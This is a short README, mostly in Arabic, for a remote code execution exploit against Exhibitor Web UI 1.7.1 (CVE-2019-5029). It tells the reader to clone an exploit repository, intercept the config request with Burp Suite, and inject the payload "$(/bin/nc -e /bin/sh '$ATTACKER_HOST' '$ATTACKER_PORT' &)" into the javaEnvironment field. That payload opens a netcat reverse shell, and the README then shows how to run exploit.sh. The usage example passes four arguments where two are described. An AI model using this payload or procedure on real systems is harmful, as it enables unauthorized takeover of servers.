
Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029
واجهة ويب إكزيبيتور 1.7.1 تنفيذ تعليمات برمجية عن بعد، CVE-2019-5029
$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/
$ cd Exihibitor-RCE/
قد تحتاج إلى تعديل حمولة بيانات json في السكريبت. للقيام بذلك، ببساطة التقط الطلب باستخدام burpsuite عند تطبيق التغييرات في علامة التبويب config في exihibitor وانسخه والصقه في أمر curl في السكريبت.
تأكد من تغيير javaEnvironment إلى التالي:
"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"
./exploit.sh <attacker_host> <attacker_port>
مثال:
$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080
